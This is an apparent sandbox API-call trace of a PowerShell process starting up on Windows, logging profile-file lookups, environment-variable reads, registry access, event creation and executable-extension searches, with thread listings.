	[0563.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0563.870] SetErrorMode (uMode=0x1) returned 0x1
	[0563.870] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed5a0 | out: lpFileInformation=0xed5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.870] SetErrorMode (uMode=0x1) returned 0x1
	[0563.870] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0563.870] SetErrorMode (uMode=0x1) returned 0x1
	[0563.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed5a0 | out: lpFileInformation=0xed5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.870] SetErrorMode (uMode=0x1) returned 0x1
	[0563.870] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0563.871] SetErrorMode (uMode=0x1) returned 0x1
	[0563.871] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed5a0 | out: lpFileInformation=0xed5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.871] SetErrorMode (uMode=0x1) returned 0x1
	[0563.871] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0563.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.871] CoTaskMemFree (pv=0x30af90) 
	[0563.872] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0563.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.872] CoTaskMemFree (pv=0x30af90) 
	[0563.872] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0563.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.872] CoTaskMemFree (pv=0x30af90) 
	[0563.873] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0563.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.873] CoTaskMemFree (pv=0x30af90) 
	[0563.878] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0563.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.878] CoTaskMemFree (pv=0x30af90) 
	[0563.880] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x188
	[0563.880] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0563.880] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0563.880] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0563.880] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2f8
	[0563.880] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2fc
	[0565.207] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0565.207] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0565.207] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0565.208] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0565.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0565.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0565.210] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0565.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.210] CoTaskMemFree (pv=0x30af90) 
	[0565.213] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0565.214] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xed780 | out: lpMode=0xed780) returned 1
	[0565.216] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0565.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.216] CoTaskMemFree (pv=0x30af90) 
	[0565.220] SetEvent (hEvent=0x390) returned 1
	[0565.220] SetEvent (hEvent=0x188) returned 1
	[0565.220] SetEvent (hEvent=0x300) returned 1
	[0565.220] SetEvent (hEvent=0x304) returned 1
	[0565.220] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0565.223] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0565.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.223] CoTaskMemFree (pv=0x30af90) 
	[0565.224] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x344) returned 0x0
	[0565.224] RegQueryValueExW (in: hKey=0x344, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xed45c, lpData=0x0, lpcbData=0xed458*=0x0 | out: lpType=0xed45c*=0x0, lpData=0x0, lpcbData=0xed458*=0x0) returned 0x2

Thread:
	id = 212
	os_tid = 0xc2c


Thread:
	id = 233
	os_tid = 0xcc4


Thread:
	id = 513
	os_tid = 0x12b8


Thread:
	id = 516
	os_tid = 0x12d4


Thread:
	id = 769
	os_tid = 0x17bc


Thread:
	id = 799
	os_tid = 0x1048


Thread:
	id = 800
	os_tid = 0x103c

	[0456.707] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0513.150] LocalFree (hMem=0x2d2030) returned 0x0
	[0513.150] CloseHandle (hObject=0x30c) returned 1
	[0513.151] CloseHandle (hObject=0x13) returned 1
	[0513.151] CloseHandle (hObject=0xf) returned 1
	[0513.152] RegCloseKey (hKey=0x2fc) returned 0x0
	[0513.152] RegCloseKey (hKey=0x2f8) returned 0x0
	[0513.152] RegCloseKey (hKey=0x2f4) returned 0x0
	[0513.152] LocalFree (hMem=0x2d2060) returned 0x0
	[0513.152] RegCloseKey (hKey=0x320) returned 0x0
	[0525.947] RegCloseKey (hKey=0x320) returned 0x0
	[0532.748] RegCloseKey (hKey=0x320) returned 0x0
	[0547.388] RegCloseKey (hKey=0x38c) returned 0x0
	[0547.388] RegCloseKey (hKey=0x388) returned 0x0
	[0547.389] RegCloseKey (hKey=0x364) returned 0x0
	[0547.389] RegCloseKey (hKey=0x3a0) returned 0x0
	[0547.389] RegCloseKey (hKey=0x380) returned 0x0
	[0547.390] RegCloseKey (hKey=0x37c) returned 0x0
	[0547.390] RegCloseKey (hKey=0x378) returned 0x0
	[0547.390] RegCloseKey (hKey=0x374) returned 0x0
	[0547.390] RegCloseKey (hKey=0x370) returned 0x0
	[0547.391] RegCloseKey (hKey=0x36c) returned 0x0
	[0547.391] RegCloseKey (hKey=0x368) returned 0x0
	[0547.391] RegCloseKey (hKey=0x340) returned 0x0
	[0547.391] RegCloseKey (hKey=0x39c) returned 0x0
	[0547.392] RegCloseKey (hKey=0x398) returned 0x0
	[0547.392] RegCloseKey (hKey=0x360) returned 0x0
	[0547.392] RegCloseKey (hKey=0x35c) returned 0x0
	[0547.392] RegCloseKey (hKey=0x358) returned 0x0
	[0547.393] RegCloseKey (hKey=0x354) returned 0x0
	[0547.393] RegCloseKey (hKey=0x350) returned 0x0
	[0547.393] RegCloseKey (hKey=0x34c) returned 0x0
	[0547.393] RegCloseKey (hKey=0x348) returned 0x0
	[0547.394] RegCloseKey (hKey=0x344) returned 0x0
	[0547.394] RegCloseKey (hKey=0x394) returned 0x0
	[0547.394] RegCloseKey (hKey=0x334) returned 0x0
	[0547.394] RegCloseKey (hKey=0x330) returned 0x0
	[0547.395] RegCloseKey (hKey=0x32c) returned 0x0
	[0547.395] RegCloseKey (hKey=0x328) returned 0x0
	[0547.395] RegCloseKey (hKey=0x324) returned 0x0
	[0547.396] RegCloseKey (hKey=0x30c) returned 0x0
	[0547.396] RegCloseKey (hKey=0x2fc) returned 0x0
	[0547.396] RegCloseKey (hKey=0x2f8) returned 0x0
	[0547.396] RegCloseKey (hKey=0x390) returned 0x0
	[0547.396] RegCloseKey (hKey=0x320) returned 0x0
	[0583.897] RegCloseKey (hKey=0x344) returned 0x0

Thread:
	id = 893
	os_tid = 0x17e8


Thread:
	id = 1130
	os_tid = 0x19f4

	[0566.458] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0566.462] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0566.467] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0566.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.467] CoTaskMemFree (pv=0x30af90) 
	[0566.469] VirtualQuery (in: lpAddress=0x1c71d8e0, lpBuffer=0x1c71e7a0, dwLength=0x30 | out: lpBuffer=0x1c71e7a0*(BaseAddress=0x1c71d000, AllocationBase=0x1bd90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0566.472] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0566.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.472] CoTaskMemFree (pv=0x30af90) 
	[0566.475] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0566.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.475] CoTaskMemFree (pv=0x30af90) 
	[0566.478] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0566.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.478] CoTaskMemFree (pv=0x30af90) 
	[0567.804] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.804] CoTaskMemFree (pv=0x30af90) 
	[0567.806] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.806] CoTaskMemFree (pv=0x30af90) 
	[0567.808] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.808] CoTaskMemFree (pv=0x30af90) 
	[0567.813] VirtualQuery (in: lpAddress=0x1c71db90, lpBuffer=0x1c71ea50, dwLength=0x30 | out: lpBuffer=0x1c71ea50*(BaseAddress=0x1c71d000, AllocationBase=0x1bd90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0567.814] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.814] CoTaskMemFree (pv=0x30af90) 
	[0567.817] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.817] CoTaskMemFree (pv=0x30af90) 
	[0567.817] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.817] CoTaskMemFree (pv=0x30af90) 
	[0567.819] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.819] CoTaskMemFree (pv=0x30af90) 
	[0567.823] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0567.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.823] CoTaskMemFree (pv=0x30af90) 
	[0570.808] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.808] CoTaskMemFree (pv=0x30af90) 
	[0570.811] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.811] CoTaskMemFree (pv=0x30af90) 
	[0570.812] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.813] CoTaskMemFree (pv=0x30af90) 
	[0570.815] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.816] CoTaskMemFree (pv=0x30af90) 
	[0570.819] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.819] CoTaskMemFree (pv=0x30af90) 
	[0570.821] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.821] CoTaskMemFree (pv=0x30af90) 
	[0570.823] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0570.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.823] CoTaskMemFree (pv=0x30af90) 
	[0572.450] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0572.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.450] CoTaskMemFree (pv=0x30af90) 
	[0574.007] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0574.007] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0574.007] CoTaskMemFree (pv=0x30af90) 
	[0574.010] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0574.010] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0574.010] CoTaskMemFree (pv=0x30af90) 
	[0574.010] CoTaskMemAlloc (cb=0x128) returned 0x27b330
	[0574.010] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x27b330, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0574.010] CoTaskMemFree (pv=0x27b330) 
	[0574.015] CoTaskMemAlloc (cb=0x20e) returned 0x1b834970
	[0574.015] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b834970 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0574.015] CoTaskMemFree (pv=0x1b834970) 
	[0574.019] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0574.020] SetErrorMode (uMode=0x1) returned 0x1
	[0575.459] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0575.468] SetErrorMode (uMode=0x1) returned 0x1
	[0575.470] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0575.470] SetErrorMode (uMode=0x1) returned 0x1
	[0575.470] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0575.478] SetErrorMode (uMode=0x1) returned 0x1
	[0575.479] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0575.480] SetErrorMode (uMode=0x1) returned 0x1
	[0575.480] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0575.488] SetErrorMode (uMode=0x1) returned 0x1
	[0575.489] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0575.489] SetErrorMode (uMode=0x1) returned 0x1
	[0575.489] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0575.497] SetErrorMode (uMode=0x1) returned 0x1
	[0575.499] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0575.499] SetErrorMode (uMode=0x1) returned 0x1
	[0575.499] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0576.961] SetErrorMode (uMode=0x1) returned 0x1
	[0576.962] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0576.963] SetErrorMode (uMode=0x1) returned 0x1
	[0576.963] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0576.971] SetErrorMode (uMode=0x1) returned 0x1
	[0576.972] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0576.972] SetErrorMode (uMode=0x1) returned 0x1
	[0576.972] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0576.981] SetErrorMode (uMode=0x1) returned 0x1
	[0576.982] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0576.982] SetErrorMode (uMode=0x1) returned 0x1
	[0576.982] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0576.991] SetErrorMode (uMode=0x1) returned 0x1
	[0576.992] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0576.992] SetErrorMode (uMode=0x1) returned 0x1
	[0576.992] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0578.843] SetErrorMode (uMode=0x1) returned 0x1
	[0578.844] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0578.845] SetErrorMode (uMode=0x1) returned 0x1
